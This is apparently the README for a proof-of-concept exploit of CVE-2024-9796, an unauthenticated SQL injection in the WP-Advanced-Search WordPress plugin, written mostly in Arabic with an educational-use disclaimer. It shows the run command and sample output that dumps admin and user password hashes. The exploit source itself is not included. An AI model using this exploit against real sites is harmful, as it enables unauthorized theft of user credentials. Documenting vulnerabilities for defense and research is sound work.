
CVE-2024-9796 WP-Advanced-Search < 3.3.9.2 - حقن SQL غير مصادق عليه. Poc.
سيقوم إثبات المفهوم (PoC) لحقن SQL بتفريغ مستخدمي ووردبريس وتجزئاتهم.
هذا النص البرمجي مخصص للأغراض التعليمية فقط.
لا تستخدمه لأغراض غير قانونية.
إذا قمت بذلك، فذلك يقع على مسؤوليتك بالكامل؛ ولست مسؤولاً عن أي إساءة استخدام.
https://wpscan.com/vulnerability/2ddd6839-6bcb-4bb8-97e0-1516b8c2b99b/
# Successful attempt
python3 poc.py -i 127.0.0.1
[!] 127.0.0.1 has been PWNed!
admin:$P$H5blBNpO5AVI7eDJJi95E6pso16h981
user:$P$H1Sa1pcnzwWha3G9XH5rkfB6wOcE2a1
# unsuccessful attempt
python3 poc.py -i 127.0.0.1
[!] Doesn't look vulnerable..